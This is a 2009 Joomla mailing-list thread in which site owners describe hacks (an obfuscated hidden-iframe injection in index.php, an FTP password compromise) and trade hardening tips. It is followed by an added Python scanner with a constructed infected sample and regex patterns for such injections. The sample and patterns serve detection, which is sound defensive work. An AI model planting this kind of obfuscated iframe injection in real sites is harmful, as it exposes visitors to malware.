But why are you using javascript for your menus... ;) /runs to twitter

Barrie North
~Fully Managed Joomla Sites~
www.simplweb.com/joomla
~Join the Community at compassdesigns.net~
www.compassdesigns.net/join-the-community.html

On Thu, Mar 26, 2009 at 8:40 PM, Mitch Pirtle <mitch.pir...@gmail.com> wrote:
> This information is unfortunately too late for Barrie, but I have
> found vsftpd (Very Secure FTP Daemon) not only secure but wikkid fast
> to boot. It supports SFTP, so folks that don't have SSH/SCP can still
> use a half-decent client and run over a moderately encrypted
> connection.
>
> As for the defense of folks running PHP4, mass shared hosting, and
> whatnot... I just made an off-hand comment a few seconds ago regarding
> folks using outdated javascript menus that search bots could not
> parse:
>
> "If you're not keeping up with the times, don't expect your website to
> perform well."
>
> I cannot stress that enough. Seriously. Don't take your horse and cart
> on the information superhighway; and if that is all you can afford,
> perhaps you need to save up before you take that first ride, and for
> certain stay well away from the fast lane. Just like starting a
> business - if you cannot pony up the funds required to incorporate a
> legitimate entity, don't expect to be treated like a legitimate
> entity!
>
> I know it may sound harsh, maybe I'm just grumpy from working too many
> hours.
>
> -- Mitch, grumpy from working too many hours
>
> 2009/3/26 Barrie North <bar...@compassdesigns.net>:
> > We found the attacks/IP in the server logs. A financially backed hacker
> > outfit from Nigeria, go figure. The joys of having a PR9 site =P
> >
> > Our password was 10 chars including letters, numbers and punctuation. We are
> > hosted on a "secured" rackspace server.
> >
> > We don't have FTP running any more!
> >
> > Barrie North
> > ~Fully Managed Joomla Sites~
> > www.simplweb.com/joomla
> > ~Join the Community at compassdesigns.net~
> > www.compassdesigns.net/join-the-community.html
> >
> >
> > On Thu, Mar 26, 2009 at 7:29 PM, Atir Javid <atirja...@gmail.com> wrote:
> >>
> >> Hello Barrie,
> >>
> >> May I inquire as to how you verified the attack? I know that FTP
> >> bruteforcing is extremely difficult, and that is very improbable.
> >> What you may have faced was a dictionary attack, which may have worked
> >> with some luck if you had a weak password. A password including a mix
> >> of
> >>
> >> 1) UPPERCASE
> >> 2) lowercase
> >> 3) punctuation/!#$.,
> >> 4) numbers
> >>
> >> and have a good strong/long password you would never fall victim to
> >> dictionary.
> >>
> >> As for bruteforce, an ftpd simply denies access after 3 or 5
> >> (configurable, usually defaults to 3) failed login attempts for some
> >> time. Some hosts go as far as restricting ftp access until you call
> >> them and verify the problem. Also, brute forcing over a TCP pipe a
> >> slow protocol such as FTP is virtually impossible. At this rate it
> >> would take YEARS to bruteforce the password if not DECADES.
> >>
> >> @ Other users
> >> Also make sure to go into joomla user configuration and change the
> >> username of 'admin' to something else.
> >> To protect your joomla administration section, if you have a static ip,
> >> you can add
> >>
> >> order allow,deny
> >> deny from all
> >> allow from your.static.ip.here
> >>
> >> to a file called .htaccess in your administration folder. If for some
> >> reason your ip changes and you get locked out, simply login via FTP
> >> and update the .htaccess file. There are some other advanced methods
> >> for protecting your administration folder.
> >>
> >> Also, FTP was a protocol developed 30+ years ago. It is not secure,
> >> clear text authentication, etc. FTP must go. If you can help it, do
> >> not use ftp, instead SFTP, or SSH. Just.. anything but FTP. Sadly,
> >> that's all that is easy to use, highly available across all hosts, and
> >> not everyone on shared hosting provides SSH access. If you can do
> >> without it, do without it. http://wooledge.org/mywiki/FtpMustDie
> >>
> >> I have seen more sites hacked due to unpatched php or bad php
> >> code (mostly from 3rd party addons) more than I have with FTP though.
> >>
> >> Still with good security practices you can reduce the risk considerably.
> >>
> >> Peace.
> >>
> >>
> >> 2009/3/26 Barrie North <bar...@compassdesigns.net>:
> >> > We got hacked last month by a brute force attack on our FTP password.
> >> > Once they had that, they got into the Joomla files.
> >> >
> >> > Any site can be hacked. The other half of the equation is vigilance and
> >> > backups :)
> >> >
> >> > Barrie North
> >> > ~Fully Managed Joomla Sites~
> >> > www.simplweb.com/joomla
> >> > ~Join the Community at compassdesigns.net~
> >> > www.compassdesigns.net/join-the-community.html
> >> >
> >> >
> >> > On Wed, Mar 25, 2009 at 11:23 PM, Mark Simko <masi...@verizon.net> wrote:
> >> >>
> >> >> Several of my clients' 1.0.15 sites have been hacked this week! Is
> >> >> there a problem with 1.0?
> >> >>
> >> >> I don't see an announcement on joomla.org
> >> >>
> >> >> I just saw that my site was hacked the other day. Fortunately they
> >> >> bunged it up a bit, so the code didn't run, but instead gave an error
> >> >> message.
> >> >>
> >> >> What they had done is append javascript to the index.php file. It was
> >> >> disguised as ascii codes, and there were several var defined and
> >> >> substituted in, but the result was that it attempted to open a hidden
> >> >> iframe directed to siplank.com. When I tried to open siplank.com in a
> >> >> web browser (yes, I did that! I do lots of crazy things out of
> >> >> curiosity) Firefox stopped it with a warning about the site being known
> >> >> for malware.
> >> >>
> >> >> I'm running 1.5.9 on a shared host. I will be calling my host and
> >> >> asking them what they can find out from their logs as to what happened.
> >> >>
> >> >> _______________________________________________
> >> >> New York PHP SIG: Joomla! Mailing List
> >> >> http://lists.nyphp.org/mailman/listinfo/joomla
> >> >>
> >> >> NYPHPCon 2006 Presentations Online
> >> >> http://www.nyphpcon.com
> >> >>
> >> >> Show Your Participation in New York PHP
> >> >> http://www.nyphp.org/show_participation.php
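A defender's check for the symptom Mark describes further up the thread (JavaScript appended after the PHP in index.php, hidden behind character codes, opening an invisible iframe): this is an added example, not code from the thread or from Joomla. The two sample file contents and the example.invalid hostname are constructed for the demonstration.

```python
import re
from pathlib import Path

# Constructed stand-ins, not files from the thread: a clean Joomla-style index.php
# and the same file with an appended <script> that assembles a hidden iframe from
# character codes, as Mark describes. example.invalid is a placeholder hostname.
CLEAN_PHP = "<?php\ndefine('_JEXEC', 1);\nrequire_once 'includes/framework.php';\n"
INFECTED_PHP = CLEAN_PHP + (
    "?><script>var a=String.fromCharCode(60,105,102,114,97,109,101);"
    "var b=\"\\x73\\x72\\x63\";document.write(a+' '+b+'=\"http://example.invalid/\" "
    "width=0 height=0 style=\"visibility:hidden\"></iframe>');</script>\n"
)

# Indicators checked against the raw file text.
RAW_INDICATORS = {
    "script_after_php_close": re.compile(r"\?>\s*<script", re.I),
    "fromCharCode_sequence": re.compile(r"String\.fromCharCode\s*\(\s*\d+(?:\s*,\s*\d+){3,}", re.I),
    "hex_escape_run": re.compile(r"(?:\\x[0-9a-f]{2}){3,}", re.I),
}
# Indicators that only become visible once the character codes are resolved.
DECODED_INDICATORS = {
    "hidden_iframe": re.compile(
        r"<iframe\b.{0,200}?(?:width\s*=\s*['\"]?0\b|height\s*=\s*['\"]?0\b"
        r"|display\s*:\s*none|visibility\s*:\s*hidden)", re.I | re.S),
}

def deobfuscate(text: str) -> str:
    """Replace String.fromCharCode(...) calls and \\xNN escapes with the characters
    they produce, so the patterns see roughly what the browser would have run."""
    def from_codes(m):
        codes = re.findall(r"\d+", m.group(1))
        return '"' + "".join(chr(int(c)) for c in codes if int(c) < 0x110000) + '"'
    text = re.sub(r"String\.fromCharCode\s*\(([\d\s,]+)\)", from_codes, text, flags=re.I)
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)

def scan_source(text: str) -> list[str]:
    """Return the names of every indicator that fires on one PHP source string."""
    hits = [name for name, rx in RAW_INDICATORS.items() if rx.search(text)]
    decoded = deobfuscate(text)
    return hits + [name for name, rx in DECODED_INDICATORS.items() if rx.search(decoded)]

def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk a Joomla install and map each flagged .php file to its indicators."""
    results: dict[str, list[str]] = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            results[str(path)] = hits
    return results
```

scan_tree() returns only the files that tripped at least one indicator; the patterns are heuristics, so a hit is a file to diff against a known-good copy or backup, not a verdict on its own.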